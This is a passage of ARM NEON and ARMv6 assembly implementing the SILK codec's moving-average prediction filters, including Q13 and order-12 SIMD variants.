vld1.32 {val4_S3_lo, val4_S3_hi, val4_S4_lo, val4_S4_hi}, [r2] /*read last 16 Ss*/
vmov.i32 val4_S5, #0 /*clear q6*/
mov const4_2048, #2048 /*r3 = 1 << 11, will be used for rounding.*/
and tmp_len, val_len, #3 /*r5 = r4 % 4 ==> numbers in second loop*/
blt LR(3, f)
vdup.32 val4_const, const4_2048 /*d12 = [2048] [2048]*/
sub val_len, val_len, #4
L(2) // Input/Ouput are processed SI4D
ldrsh val4_in0, [ptr4_in], #2 /*in[k]*/
ldrsh val4_in1, [ptr4_in], #2
vext.32 val4_S0, val4_S0, val4_S1, #1 /*shift S[2k] in */
vdup.16 val4_in, val4_in0 /*mov r0 to q9(d2, d3)*/
vext.32 val4_S1, val4_S1, val4_S2, #1 /*shift q2 by 32bit and put 32-lsb of q3 to 32-msb q2*/
vext.32 val4_S2, val4_S2, val4_S3, #1 /*shift q3 by 32bit and put 32-lsb of q4 to 32-msb q3*/
vext.32 val4_S3, val4_S3, val4_S4, #1 /*shift q4 by 32bit and put 32-lsb of q5 to 32-msb q4*/
vext.32 val4_S4, val4_S4, val4_S5, #1 /*shift q5 by 32bit and put 32-lsb of q6 to 32-msb q5*/
vmlal.s16 val4_S1, val4_B0_lo, val4_in_lo /*calculate S[0-3]*/
vmlal.s16 val4_S2, val4_B0_hi, val4_in_lo /*calculate S[4-7]*/
vmlal.s16 val4_S3, val4_B1_lo, val4_in_lo /*calculate S[8-11]*/
vmlal.s16 val4_S4, val4_B1_hi, val4_in_lo /*calculate S[12-15]*/
vmov val4_out_lo, val4_in0, val4_in1 /*in[2k], in[2k]+1 ==> q10*/
vext.32 val4_S0, val4_S0, val4_S1, #1 /*shift S[2k] in */
vdup.16 val4_in, val4_in1 /*mov r0 to q1(d2, d3)*/
vext.32 val4_S1, val4_S1, val4_S2, #1 /*shift q2 by 32bit and put 32-lsb of q3 to 32-msb q2*/
vext.32 val4_S2, val4_S2, val4_S3, #1 /*shift q3 by 32bit and put 32-lsb of q4 to 32-msb q3*/
vext.32 val4_S3, val4_S3, val4_S4, #1 /*shift q4 by 32bit and put 32-lsb of q5 to 32-msb q4*/
vext.32 val4_S4, val4_S4, val4_S5, #1 /*shift q5 by 32bit and put 32-lsb of q6 to 32-msb q5*/
vmlal.s16 val4_S1, val4_B0_lo, val4_in_lo /*calculate S[0-3]*/
vmlal.s16 val4_S2, val4_B0_hi, val4_in_lo /*calculate S[4-7]*/
vmlal.s16 val4_S3, val4_B1_lo, val4_in_lo /*calculate S[8-11]*/
vmlal.s16 val4_S4, val4_B1_hi, val4_in_lo /*calculate S[12-15]*/
ldrsh val4_in0, [ptr4_in], #2 /*in[k]*/
ldrsh val4_in1, [ptr4_in], #2
vext.32 val4_S0, val4_S0, val4_S1, #1 /*shift S[2k] in */
vdup.16 val4_in, val4_in0 /*mov r0 to q9(d2, d3)*/
vext.32 val4_S1, val4_S1, val4_S2, #1 /*shift q2 by 32bit and put 32-lsb of q3 to 32-msb q2*/
vext.32 val4_S2, val4_S2, val4_S3, #1 /*shift q3 by 32bit and put 32-lsb of q4 to 32-msb q3*/
vext.32 val4_S3, val4_S3, val4_S4, #1 /*shift q4 by 32bit and put 32-lsb of q5 to 32-msb q4*/
vext.32 val4_S4, val4_S4, val4_S5, #1 /*shift q5 by 32bit and put 32-lsb of q6 to 32-msb q5*/
vmlal.s16 val4_S1, val4_B0_lo, val4_in_lo /*calculate S[0-3]*/
vmlal.s16 val4_S2, val4_B0_hi, val4_in_lo /*calculate S[4-7]*/
vmlal.s16 val4_S3, val4_B1_lo, val4_in_lo /*calculate S[8-11]*/
vmlal.s16 val4_S4, val4_B1_hi, val4_in_lo /*calculate S[12-15]*/
vmov val4_out_hi, val4_in0, val4_in1 /*in[2k], in[2k]+1 ==> q10*/
vext.32 val4_S0, val4_S0, val4_S1, #1 /*shift S[2k] in */
vdup.16 val4_in, val4_in1 /*mov r0 to q1(d2, d3)*/
vext.32 val4_S1, val4_S1, val4_S2, #1 /*shift q2 by 32bit and put 32-lsb of q3 to 32-msb q2*/
vext.32 val4_S2, val4_S2, val4_S3, #1 /*shift q3 by 32bit and put 32-lsb of q4 to 32-msb q3*/
vext.32 val4_S3, val4_S3, val4_S4, #1 /*shift q4 by 32bit and put 32-lsb of q5 to 32-msb q4*/
vext.32 val4_S4, val4_S4, val4_S5, #1 /*shift q5 by 32bit and put 32-lsb of q6 to 32-msb q5*/
vmlal.s16 val4_S1, val4_B0_lo, val4_in_lo /*calculate S[0-3]*/
vmlal.s16 val4_S2, val4_B0_hi, val4_in_lo /*calculate S[4-7]*/
vmlal.s16 val4_S3, val4_B1_lo, val4_in_lo /*calculate S[8-11]*/
vmlal.s16 val4_S4, val4_B1_hi, val4_in_lo /*calculate S[12-15]*/
vshl.s32 val4_out, val4_out, #12 /*SKP_LSHIFT(in16, 12)*/
vsub.s32 val4_out, val4_out, val4_S0 /*SKP_LSHIFT(in16, 12) - S[0]*/
vqadd.s32 val4_out, val4_out, val4_const /*qadd out32, out32, LR(0, x)2048*/
vqshrn.s32 val4_S0_lo, val4_out, #12
subs val_len, val_len, #4
vst1.16 val4_S0_lo, [ptr4_out]!
bge LR(2, b)
cmp tmp_len, #0
beq LR(4, f)
vst1.32 val4_S1_lo, [sp]
ldr val4_rS0, [sp] /*r6 = new [S0]*/
L(3) // Input/Ouput are processed 1 by 1
L(0)
ldrsh val4_in0, [ptr4_in], #2 /*in[k]*/
vext.32 val4_S1, val4_S1, val4_S2, #1 /*shift q2 by 32bit and put 32-lsb of q3 to 32-msb q2*/
vext.32 val4_S2, val4_S2, val4_S3, #1 /*shift q3 by 32bit and put 32-lsb of q4 to 32-msb q3*/
vext.32 val4_S3, val4_S3, val4_S4, #1 /*shift q4 by 32bit and put 32-lsb of q5 to 32-msb q4*/
vext.32 val4_S4, val4_S4, val4_S5, #1 /*shift q5 by 32bit and put 32-lsb of q6 to 32-msb q5*/
vdup.16 val4_S0, val4_in0 /*mov r0 to q1(d2, d3)*/
rsb val4_out32, val4_rS0, val4_in0, lsl #12 /*out32 = SKP_LSHIFT(in16, 12) - S[0];*/
vmlal.s16 val4_S1, val4_B0_lo, val4_S0_lo /*calculate S[0-3]*/
vmlal.s16 val4_S2, val4_B0_hi, val4_S0_lo /*calculate S[4-7]*/
vmlal.s16 val4_S3, val4_B1_lo, val4_S0_lo /*calculate S[8-11]*/
vmlal.s16 val4_S4, val4_B1_hi, val4_S0_lo /*calculate S[12-15]*/
vst1.32 val4_S1_lo, [sp]
qadd val4_out32, val4_out32, const4_2048
ssat val4_out32, #16, val4_out32, asr #12 /*out = round and sat*/
subs tmp_len, tmp_len, #1
strh val4_out32, [ptr4_out], #2
ldr val4_rS0, [sp] /*r6 = new [S0]*/
bgt LR(0, b)
L(4)
sub r2, r2, #32
vst1.32 {val4_S1_lo, val4_S1_hi, val4_S2_lo, val4_S2_hi}, [r2]!
vst1.32 {val4_S3_lo, val4_S3_hi, val4_S4_lo, val4_S4_hi}, [r2]
add sp, sp, #16
vpop {q8-q11}
vpop {q0-q7}
ldmia sp!, {r4-r10, fp, ip, pc}
/*SYM(SKP_Silk_MA_Prediction_ARMv7_order12):*/
L(6)
VARDEF ptr5_in, sb
VARDEF ptr5_out, sl
VARDEF val5_rS0, r6
VARDEF val5_in0, r0
VARDEF val5_in1, r1
VARDEF const5_2048, r3
VARDEF val5_out32, r8
VARDEFD val5_B1_lo, d0
VARDEFD val5_B1_hi, d1
VARDEFD val5_B2_lo, d2
VARDEFQ val5_S1, q2
VARDEFD val5_S1_lo, d4
VARDEFD val5_S1_hi, d5
VARDEFQ val5_S2, q3
VARDEFD val5_S2_lo, d6
VARDEFD val5_S2_hi, d7
VARDEFQ val5_S3, q4
VARDEFD val5_S3_lo, d8
VARDEFD val5_S3_hi, d9
VARDEFQ val5_S4, q5
VARDEFQ val5_S0, q8
VARDEFD val5_S0_lo, d16
VARDEFQ val5_const, q7
VARDEFQ val5_in, q9
VARDEFD val5_in_lo, d18
VARDEFQ val5_out, q10
VARDEFD val5_out_lo, d20
VARDEFD val5_out_hi, d21
str r0, [sp, #sp_ptr_in] /*in*/
str r1, [sp, #sp_ptr_B] /*B*/
str r2, [sp, #sp_ptr_S] /*S*/
str r3, [sp, #sp_ptr_out] /*out*/
cmp val_len, #4
mov ptr5_in, r0 /*in*/
mov ptr5_out, r3 /*out*/
ldr val5_rS0, [r2] /*r6 = S[0]*/
vld1.16 {val5_B1_lo, val5_B1_hi, val5_B2_lo}, [r1] /*read all 16 Bs*/
vld1.32 {val5_S1_lo, val5_S1_hi, val5_S2_lo, val5_S2_hi}, [r2]! /*read first 16 Ss*/
vld1.32 {val5_S3_lo, val5_S3_hi}, [r2] /*read last 16 Ss*/
vmov.i32 val5_S4, #0 /*clear q5*/
mov const5_2048, #2048 /*r3 = 1 << 11, will be used for rounding.*/
and tmp_len, val_len, #3 /*r5 = r4 % 4 ==> numbers in second loop*/
blt LR(3, f)
vdup.32 val5_const, const5_2048 /*d12 = [2048] [2048]*/
sub val_len, val_len, #4
L(2) // Input/Ouput are processed SI4D
ldrsh val5_in0, [ptr5_in], #2 /*in[k]*/
ldrsh val5_in1, [ptr5_in], #2
vext.32 val5_S0, val5_S0, val5_S1, #1 /*shift S[2k] in */
vdup.16 val5_in, val5_in0 /*mov r0 to q9(d2, d3)*/
vext.32 val5_S1, val5_S1, val5_S2, #1 /*shift q2 by 32bit and put 32-lsb of q3 to 32-msb q2*/
vext.32 val5_S2, val5_S2, val5_S3, #1 /*shift q3 by 32bit and put 32-lsb of q4 to 32-msb q3*/
vext.32 val5_S3, val5_S3, val5_S4, #1 /*shift q4 by 32bit and put 32-lsb of q5 to 32-msb q4*/
vmlal.s16 val5_S1, val5_B1_lo, val5_in_lo /*calculate S[0-3]*/
vmlal.s16 val5_S2, val5_B1_hi, val5_in_lo /*calculate S[4-7]*/
vmlal.s16 val5_S3, val5_B2_lo, val5_in_lo /*calculate S[8-11]*/
vmov val5_out_lo, val5_in0, val5_in1 /*in[2k], in[2k]+1 ==> q10*/
vext.32 val5_S0, val5_S0, val5_S1, #1 /*shift S[2k] in */
vdup.16 val5_in, val5_in1 /*mov r0 to q1(d2, d3)*/
vext.32 val5_S1, val5_S1, val5_S2, #1 /*shift q2 by 32bit and put 32-lsb of q3 to 32-msb q2*/
vext.32 val5_S2, val5_S2, val5_S3, #1 /*shift q3 by 32bit and put 32-lsb of q4 to 32-msb q3*/
vext.32 val5_S3, val5_S3, val5_S4, #1 /*shift q4 by 32bit and put 32-lsb of q5 to 32-msb q4*/
vmlal.s16 val5_S1, val5_B1_lo, val5_in_lo /*calculate S[0-3]*/
vmlal.s16 val5_S2, val5_B1_hi, val5_in_lo /*calculate S[4-7]*/
vmlal.s16 val5_S3, val5_B2_lo, val5_in_lo /*calculate S[8-11]*/
ldrsh val5_in0, [ptr5_in], #2 /*in[k]*/
ldrsh val5_in1, [ptr5_in], #2
vext.32 val5_S0, val5_S0, val5_S1, #1 /*shift S[2k] in */
vdup.16 val5_in, val5_in0 /*mov r0 to q9(d2, d3)*/
vext.32 val5_S1, val5_S1, val5_S2, #1 /*shift q2 by 32bit and put 32-lsb of q3 to 32-msb q2*/
vext.32 val5_S2, val5_S2, val5_S3, #1 /*shift q3 by 32bit and put 32-lsb of q4 to 32-msb q3*/
vext.32 val5_S3, val5_S3, val5_S4, #1 /*shift q4 by 32bit and put 32-lsb of q5 to 32-msb q4*/
vmlal.s16 val5_S1, val5_B1_lo, val5_in_lo /*calculate S[0-3]*/
vmlal.s16 val5_S2, val5_B1_hi, val5_in_lo /*calculate S[4-7]*/
vmlal.s16 val5_S3, val5_B2_lo, val5_in_lo /*calculate S[8-11]*/
vmov val5_out_hi, val5_in0, val5_in1 /*in[2k], in[2k]+1 ==> q10*/
vext.32 val5_S0, val5_S0, val5_S1, #1 /*shift S[2k] in */
vdup.16 val5_in, val5_in1 /*mov r0 to q1(d2, d3)*/
vext.32 val5_S1, val5_S1, val5_S2, #1 /*shift q2 by 32bit and put 32-lsb of q3 to 32-msb q2*/
vext.32 val5_S2, val5_S2, val5_S3, #1 /*shift q3 by 32bit and put 32-lsb of q4 to 32-msb q3*/
vext.32 val5_S3, val5_S3, val5_S4, #1 /*shift q4 by 32bit and put 32-lsb of q5 to 32-msb q4*/
vmlal.s16 val5_S1, val5_B1_lo, val5_in_lo /*calculate S[0-3]*/
vmlal.s16 val5_S2, val5_B1_hi, val5_in_lo /*calculate S[4-7]*/
vmlal.s16 val5_S3, val5_B2_lo, val5_in_lo /*calculate S[8-11]*/
vshl.s32 val5_out, val5_out, #12 /*SKP_LSHIFT(in16, 12)*/
vsub.s32 val5_out, val5_out, val5_S0 /*SKP_LSHIFT(in16, 12) - S[0]*/
vqadd.s32 val5_out, val5_out, val5_const /*qadd out32, out32, LR(0, x)2048*/
vqshrn.s32 val5_S0_lo, val5_out, #12
subs val_len, val_len, #4
vst1.16 val5_S0_lo, [ptr5_out]!
bge LR(2, b)
cmp tmp_len, #0
beq LR(4, f)
vst1.32 val5_S1_lo, [sp]
ldr val5_rS0, [sp] /*r6 = new [S0]*/
L(3) // Input/Ouput are processed 1 by 1
L(0)
ldrsh val5_in0, [ptr5_in], #2 /*in[k]*/
vext.32 val5_S1, val5_S1, val5_S2, #1 /*shift q2 by 32bit and put 32-lsb of q3 to 32-msb q2*/
vext.32 val5_S2, val5_S2, val5_S3, #1 /*shift q3 by 32bit and put 32-lsb of q4 to 32-msb q3*/
vext.32 val5_S3, val5_S3, val5_S4, #1 /*shift q4 by 32bit and put 32-lsb of q5 to 32-msb q4*/
vdup.16 val5_S0, val5_in0 /*mov r0 to q8(d16, d17)*/
rsb val5_out32, val5_rS0, val5_in0, lsl #12 /*out32 = SKP_LSHIFT(in16, 12) - S[0];*/
vmlal.s16 val5_S1, val5_B1_lo, val5_S0_lo /*calculate S[0-3]*/
vmlal.s16 val5_S2, val5_B1_hi, val5_S0_lo /*calculate S[4-7]*/
vmlal.s16 val5_S3, val5_B2_lo, val5_S0_lo /*calculate S[8-11]*/
vst1.32 val5_S1_lo, [sp]
qadd val5_out32, val5_out32, const5_2048
ssat val5_out32, #16, val5_out32, asr #12 /*out = round and sat*/
subs tmp_len, tmp_len, #1
strh val5_out32, [ptr5_out], #2
ldr val5_rS0, [sp] /*r6 = new [S0]*/
bgt LR(0, b)
L(4)
sub r2, r2, #32
vst1.32 {val5_S1_lo, val5_S1_hi, val5_S2_lo, val5_S2_hi}, [r2]!
vst1.32 {val5_S3_lo, val5_S3_hi}, [r2]
add sp, sp, #16
vpop {q8-q11}
vpop {q0-q7}
ldmia sp!, {r4-r10, fp, ip, pc}
.set sp13_ptr_in, 0
.set sp13_ptr_B, 4
.set sp13_ptr_S, 8
.set sp13_ptr_out, 12
.globl SYM(SKP_Silk_MA_Prediction_Q13)
SYM(SKP_Silk_MA_Prediction_Q13):
stmdb sp!, {r4-r10, fp, ip, lr}
vpush {q0-q7}
vpush {q8-q11}
add fp, sp, #228
sub sp, sp, #16
.set arg13_len, 248
.set arg13_order, 252
/*LOAD INPUT ARGS*/
VARDEF val6_order, r5
VARDEF val6_len, r4
VARDEF ptr6_in, sb
VARDEF ptr6_out, sl
VARDEF ptr6_S, ip
VARDEF ptr6_B, lr
VARDEF val6_in, r0
VARDEF val6_S0, r1
VARDEF val6_out, r1
VARDEF val6_S1, r2
VARDEF val6_S2, r3
VARDEF val6_B, r6
VARDEF val6_SO1, _r7
VARDEF val6_SO2, r8
ldr val6_order, [sp, #arg13_order] /*order*/
ldr val6_len, [sp, #arg13_len] /*len*/
ands _r7, r1, #3 /*CHECK: if ( B is 4 byte aligned ) Prerequest for ARMv6 SIMD*/
bne LR(2, f)
ands r6, val6_order, #1 /*CHECK: if ( order % 2 == 0 ) Prerequest for ARMv6 SIMD*/
bne LR(2, f)
cmp val6_order, #12 /*CHECK: if ( order == 12 ) ARMv7 SIMD*/
beq LR(8, f)/*SYM(SKP_Silk_MA_Prediction_Q13_ARMv7_order12)*/
cmp val6_order, #6 /*CHECK: if ( order >= 6 ) Prerequest for ARMv6 SIMD*/
blt LR(2, f)
// ARMv6 SIMD
// order % 2 == 0
str r0, [sp, #sp13_ptr_in]
str r1, [sp, #sp13_ptr_B]
str r2, [sp, #sp13_ptr_S]
str r3, [sp, #sp13_ptr_out]
mov ptr6_in, r0 /*in*/
mov ptr6_out, r3 /*out*/
L(0)
ldr ptr6_S, [sp, #sp13_ptr_S] /*S*/
ldr ptr6_B, [sp, #sp13_ptr_B] /*B*/
ldrsh val6_in, [ptr6_in], #2 /*in[k]*/
ldr val6_S0, [ptr6_S], #4 /*S[0]*/
ldr val6_order, [sp, #arg13_order] /*order*/
ldr val6_S1, [ptr6_S], #4 /*S[1]*/
rsb r3, val6_S0, val6_in, lsl #13 /*SKP_LSHIFT(in16, 12) - S[0]*/
ldr val6_B, [ptr6_B], #4 /*B[0], B[1]*/
mov r3, r3, asr #12
sub val6_order, val6_order, #4 /*order - 2 - 2*/
add val6_out, r3, #1 /*SKP_RSHIFT_ROUND*/
ldr val6_S2, [ptr6_S], #4 /*S[2]*/
ssat val6_out, #16, val6_out, asr #1 /*SKP_SAT16( out32 )*/
strh val6_out, [ptr6_out], #2 /*save it to out[k]*/
L(1)
smlabb val6_SO1, val6_in, val6_B, val6_S1 /*SKP_SMLABB(S[d + 1], in16, B32)*/
smlabt val6_SO2, val6_in, val6_B, val6_S2 /*SKP_SMLABT(S[d + 2], in16, B32)*/
ldr val6_S1, [ptr6_S], #4 /*S[d+1]*/
ldr val6_S2, [ptr6_S], #-16 /*S[d+2]*/
ldr val6_B, [ptr6_B], #4 /*B[d], B[d+1]*/
subs val6_order, val6_order, #2
str val6_SO1, [ptr6_S], #4
str val6_SO2, [ptr6_S], #16
bgt LR(1, b)
smlabb val6_SO1, val6_in, val6_B, val6_S1 /*SKP_SMLABB(S[d + 1], in16, B32)*/
smlabt val6_SO2, val6_in, val6_B, val6_S2 /*SKP_SMLABT(S[d + 2], in16, B32)*/
ldr val6_S1, [ptr6_S], #-12 /*S[d+1]*/
ldr val6_B, [ptr6_B] /*B[d], B[d+1]*/
str val6_SO1, [ptr6_S], #4
str val6_SO2, [ptr6_S], #4
smlabb val6_SO1, val6_in, val6_B, val6_S1 /*SKP_SMLABB(S[d + 1], in16, B32)*/
smulbt val6_SO2, val6_in, val6_B /*SKP_SMLABT(S[d + 2], in16, B32)*/
subs val6_len, val6_len, #1
str val6_SO1, [ptr6_S], #4
str val6_SO2, [ptr6_S]
bgt LR(0, b)
add sp, sp, #16
vpop {q8-q11}
vpop {q0-q7}
ldmia sp!, {r4-r10, fp, ip, pc}
VARDEF ptr7_in, r6
VARDEF ptr7_out, sb
VARDEF val7_B0, r2
VARDEF ptr7_B, _r7
VARDEF ptr7_S, r8
VARDEF val7_S0, lr
VARDEF val7_in, r0
VARDEF val7_out, r1
VARDEF val7_B, r1
VARDEF val7_S1, r3
VARDEF val7_Sout, r2
// order % 2 != 0
L(2)
add r2, r2, #4
str r0, [sp, #sp13_ptr_in]
str r1, [sp, #sp13_ptr_B]
str r2, [sp, #sp13_ptr_S]
str r3, [sp, #sp13_ptr_out]
mov ptr7_in, r0 /*in_ptr*/
mov ptr7_out, r3 /*out_ptr*/
ldr val7_S0, [r2, #-4] /*S0*/
L(0)
ldrsh val7_in, [ptr7_in], #2 /*in[k]*/
ldr val6_order, [sp, #arg13_order] /*order*/
ldr ptr7_B, [sp, #sp13_ptr_B]
ldr ptr7_S, [sp, #sp13_ptr_S] /*S_ptr*/
rsb val7_out, val7_S0, val7_in, lsl #13
ldrsh val7_B0, [ptr7_B], #2
mov val7_out, val7_out, asr #12
ldr val7_S1, [ptr7_S]
add val7_out, val7_out, #1
smlabb val7_S0, val7_in, val7_B0, val7_S1
ssat val7_out, #16, val7_out, asr #1
sub val6_order, val6_order, #3
ldr val7_S1, [ptr7_S, #4]
strh val7_out, [ptr7_out], #2
ldrsh val7_B, [ptr7_B], #2
L(1)
smlabb val7_Sout, val7_in, val7_B, val7_S1
ldr val7_S1, [ptr7_S, #8]
ldrsh val7_B, [ptr7_B], #2
str val7_Sout, [ptr7_S], #4
subs val6_order, val6_order, #1
bgt LR(1, b)
smlabb val7_Sout, val7_in, val7_B, val7_S1
ldrsh val7_B, [ptr7_B], #2
str val7_Sout, [ptr7_S], #4
smulbb val7_Sout, val7_in, val7_B
subs val6_len, val6_len, #1
str val7_Sout, [ptr7_S]
bgt LR(0, b)
ldr r2, [sp, #sp13_ptr_S]
str val7_S0, [r2, #-4]
add sp, sp, #16
vpop {q8-q11}
vpop {q0-q7}
ldmia sp!, {r4-r10, fp, ip, pc}
/*SYM(SKP_Silk_MA_Prediction_Q13_ARMv7_order12):*/
L(8)
VARDEF ptr8_in, sb
VARDEF ptr8_out, sl
VARDEF val8_rS0, r6
VARDEF const8_4096, r3
VARDEF val8_in0, r0
VARDEF val8_in1, r1
VARDEF val8_len, r5
VARDEF val8_out32, r8
VARDEFD val8_B0_lo, d0
VARDEFD val8_B0_hi, d1
VARDEFD val8_B1_lo, d2
VARDEFQ val8_S1, q2
VARDEFD val8_S1_lo, d4
VARDEFD val8_S1_hi, d5
VARDEFQ val8_S2, q3
VARDEFD val8_S2_lo, d6
VARDEFD val8_S2_hi, d7
VARDEFQ val8_S3, q4
VARDEFD val8_S3_lo, d8
VARDEFD val8_S3_hi, d9
VARDEFQ val8_S4, q5
VARDEFQ const8, q7
VARDEFQ val8_S0, q8
VARDEFD val8_S0_lo, d16
VARDEFQ val8_in, q9
VARDEFD val8_in_lo, d18
VARDEFQ val8_out, q10
VARDEFD val8_out_lo, d20
VARDEFD val8_out_hi, d21
str r0, [sp, #sp13_ptr_in] /*in*/
str r1, [sp, #sp13_ptr_B] /*B*/
str r2, [sp, #sp13_ptr_S] /*S*/
str r3, [sp, #sp13_ptr_out] /*out*/
cmp val6_len, #4
mov ptr8_in, r0 /*in*/
mov ptr8_out, r3 /*out*/
ldr val8_rS0, [r2] /*r6 = S[0]*/
vld1.16 {val8_B0_lo, val8_B0_hi, val8_B1_lo}, [r1] /*read all 16 Bs*/
vld1.32 {val8_S1_lo, val8_S1_hi, val8_S2_lo, val8_S2_hi}, [r2]! /*read first 16 Ss*/
vld1.32 {val8_S3_lo, val8_S3_hi}, [r2] /*read last 16 Ss*/
vmov.i32 val8_S4, #0 /*clear q5*/
mov const8_4096, #4096 /*r3 = 1 << 12, will be used for rounding.*/
and val8_len, val6_len, #3 /*r5 = r4 % 4 ==> numbers in second loop*/
blt LR(3, f)
vdup.32 const8, const8_4096 /*d12 = [2048] [2048]*/
sub val6_len, val6_len, #4
L(2) // Input/Ouput are processed SI4D
ldrsh val8_in0, [ptr8_in], #2 /*in[k]*/
ldrsh val8_in1, [ptr8_in], #2
vext.32 val8_S0, val8_S0, val8_S1, #1 /*shift S[2k] in */
vdup.16 val8_in, val8_in0 /*mov r0 to q9(d2, d3)*/
vext.32 val8_S1, val8_S1, val8_S2, #1 /*shift q2 by 32bit and put 32-lsb of q3 to 32-msb q2*/
vext.32 val8_S2, val8_S2, val8_S3, #1 /*shift q3 by 32bit and put 32-lsb of q4 to 32-msb q3*/
vext.32 val8_S3, val8_S3, val8_S4, #1 /*shift q4 by 32bit and put 32-lsb of q5 to 32-msb q4*/
vmlal.s16 val8_S1, val8_B0_lo, val8_in_lo /*calculate S[0-3]*/
vmlal.s16 val8_S2, val8_B0_hi, val8_in_lo /*calculate S[4-7]*/
vmlal.s16 val8_S3, val8_B1_lo, val8_in_lo /*calculate S[8-11]*/
vmov val8_out_lo, val8_in0, val8_in1 /*in[2k], in[2k]+1 ==> q10*/
vext.32 val8_S0, val8_S0, val8_S1, #1 /*shift S[2k] in */
vdup.16 val8_in, val8_in1 /*mov r0 to q1(d2, d3)*/
vext.32 val8_S1, val8_S1, val8_S2, #1 /*shift q2 by 32bit and put 32-lsb of q3 to 32-msb q2*/
vext.32 val8_S2, val8_S2, val8_S3, #1 /*shift q3 by 32bit and put 32-lsb of q4 to 32-msb q3*/
vext.32 val8_S3, val8_S3, val8_S4, #1 /*shift q4 by 32bit and put 32-lsb of q5 to 32-msb q4*/
vmlal.s16 val8_S1, val8_B0_lo, val8_in_lo /*calculate S[0-3]*/
vmlal.s16 val8_S2, val8_B0_hi, val8_in_lo /*calculate S[4-7]*/
vmlal.s16 val8_S3, val8_B1_lo, val8_in_lo /*calculate S[8-11]*/
ldrsh val8_in0, [ptr8_in], #2 /*in[k]*/
ldrsh val8_in1, [ptr8_in], #2
vext.32 val8_S0, val8_S0, val8_S1, #1 /*shift S[2k] in */
vdup.16 val8_in, val8_in0 /*mov r0 to q9(d2, d3)*/
vext.32 val8_S1, val8_S1, val8_S2, #1 /*shift q2 by 32bit and put 32-lsb of q3 to 32-msb q2*/
vext.32 val8_S2, val8_S2, val8_S3, #1 /*shift q3 by 32bit and put 32-lsb of q4 to 32-msb q3*/
vext.32 val8_S3, val8_S3, val8_S4, #1 /*shift q4 by 32bit and put 32-lsb of q5 to 32-msb q4*/
vmlal.s16 val8_S1, val8_B0_lo, val8_in_lo /*calculate S[0-3]*/
vmlal.s16 val8_S2, val8_B0_hi, val8_in_lo /*calculate S[4-7]*/
vmlal.s16 val8_S3, val8_B1_lo, val8_in_lo /*calculate S[8-11]*/
vmov val8_out_hi, val8_in0, val8_in1 /*in[2k], in[2k]+1 ==> q10*/
vext.32 val8_S0, val8_S0, val8_S1, #1 /*shift S[2k] in */
vdup.16 val8_in, val8_in1 /*mov r0 to q1(d2, d3)*/
vext.32 val8_S1, val8_S1, val8_S2, #1 /*shift q2 by 32bit and put 32-lsb of q3 to 32-msb q2*/
vext.32 val8_S2, val8_S2, val8_S3, #1 /*shift q3 by 32bit and put 32-lsb of q4 to 32-msb q3*/
vext.32 val8_S3, val8_S3, val8_S4, #1 /*shift q4 by 32bit and put 32-lsb of q5 to 32-msb q4*/
vmlal.s16 val8_S1, val8_B0_lo, val8_in_lo /*calculate S[0-3]*/
vmlal.s16 val8_S2, val8_B0_hi, val8_in_lo /*calculate S[4-7]*/
vmlal.s16 val8_S3, val8_B1_lo, val8_in_lo /*calculate S[8-11]*/
vshl.s32 val8_out, val8_out, #13 /*SKP_LSHIFT(in16, 12)*/
vsub.s32 val8_out, val8_out, val8_S0 /*SKP_LSHIFT(in16, 12) - S[0]*/
vqadd.s32 val8_out, val8_out, const8 /*qadd out32, out32, LR(0, x)2048*/
vqshrn.s32 val8_S0_lo, val8_out, #13
subs val6_len, val6_len, #4
vst1.16 val8_S0_lo, [ptr8_out]!
bge LR(2, b)
cmp val8_len, #0
beq LR(4, f)
vst1.32 val8_S1_lo, [sp]
ldr val8_rS0, [sp] /*r6 = new [S0]*/
L(3) // Input/Ouput are processed 1 by 1
L(0)
ldrsh val8_in0, [ptr8_in], #2 /*in[k]*/
vext.32 val8_S1, val8_S1, val8_S2, #1 /*shift q2 by 32bit and put 32-lsb of q3 to 32-msb q2*/
vext.32 val8_S2, val8_S2, val8_S3, #1 /*shift q3 by 32bit and put 32-lsb of q4 to 32-msb q3*/
vext.32 val8_S3, val8_S3, val8_S4, #1 /*shift q4 by 32bit and put 32-lsb of q5 to 32-msb q4*/
vdup.16 val8_S0, val8_in0 /*mov r0 to q8(d16, d17)*/
rsb val8_out32, val8_rS0, val8_in0, lsl #13 /*out32 = SKP_LSHIFT(in16, 12) - S[0];*/
vmlal.s16 val8_S1, val8_B0_lo, val8_S0_lo /*calculate S[0-3]*/
vmlal.s16 val8_S2, val8_B0_hi, val8_S0_lo /*calculate S[4-7]*/
vmlal.s16 val8_S3, val8_B1_lo, val8_S0_lo /*calculate S[8-11]*/
vst1.32 val8_S1_lo, [sp]
qadd val8_out32, val8_out32, const8_4096
ssat val8_out32, #16, val8_out32, asr #13 /*out = round and sat*/
subs val8_len, val8_len, #1
strh val8_out32, [ptr8_out], #2
ldr val8_rS0, [sp] /*r6 = new [S0]*/
bgt LR(0, b)
L(4)
sub r2, r2, #32
vst1.32 {val8_S1_lo, val8_S1_hi, val8_S2_lo, val8_S2_hi}, [r2]!
vst1.32 {val8_S3_lo, val8_S3_hi}, [r2]
add sp, sp, #16
vpop {q8-q11}
vpop {q0-q7}
ldmia sp!, {r4-r10, fp, ip, pc}
#elif EMBEDDED_ARM>=5
/*
* void SKP_Silk_MA_Prediction(
* const SKP_int16 *in, I: input signal
* const SKP_int16 *B, I: MA coefficients, Q13 [order+1]
* SKP_int32 *S, I/O: state vector [order]
* SKP_int16 *out, O: output signal
* const SKP_int32 len, I: signal length
* const SKP_int32 order I: filter order
* )
*
*
*/
VARDEF ma_in, sb
VARDEF ma_out, sl
VARDEF ma_s, ip
VARDEF ma_b, lr
VARDEF ma_len, r4
VARDEF ma_in_val, r0
VARDEF ma_s0_val, r1
VARDEF ma_s1_val, r2
VARDEF ma_order, r5
VARDEF ma_b_val, r6
VARDEF ma_tmp0, r3
VARDEF ma_out_val, r1
VARDEF ma_const0, r3
VARDEF ma_s2_val, r3
#ifdef IPHONE
VARDEF ma_new_s1, r8
VARDEF ma_new_s2, _r7
#else
VARDEF ma_new_s1, _r7
VARDEF ma_new_s2, r8
#endif
.set SAVE_IN, 0
.set SAVE_B, 4
.set SAVE_S, 8
.set SAVE_OUT, 12
.globl SYM(SKP_Silk_MA_Prediction)
SYM(SKP_Silk_MA_Prediction):
stmdb sp!, {r4-r10, fp, ip, lr}
add fp, sp, #36
sub sp, sp, #16
.set arg_len, 56
.set arg_order, 60
/*LOAD INPUT ARGS*/
ldr ma_order, [sp, #arg_order]
ldr ma_len, [sp, #arg_len]
ands _r7, r1, #3
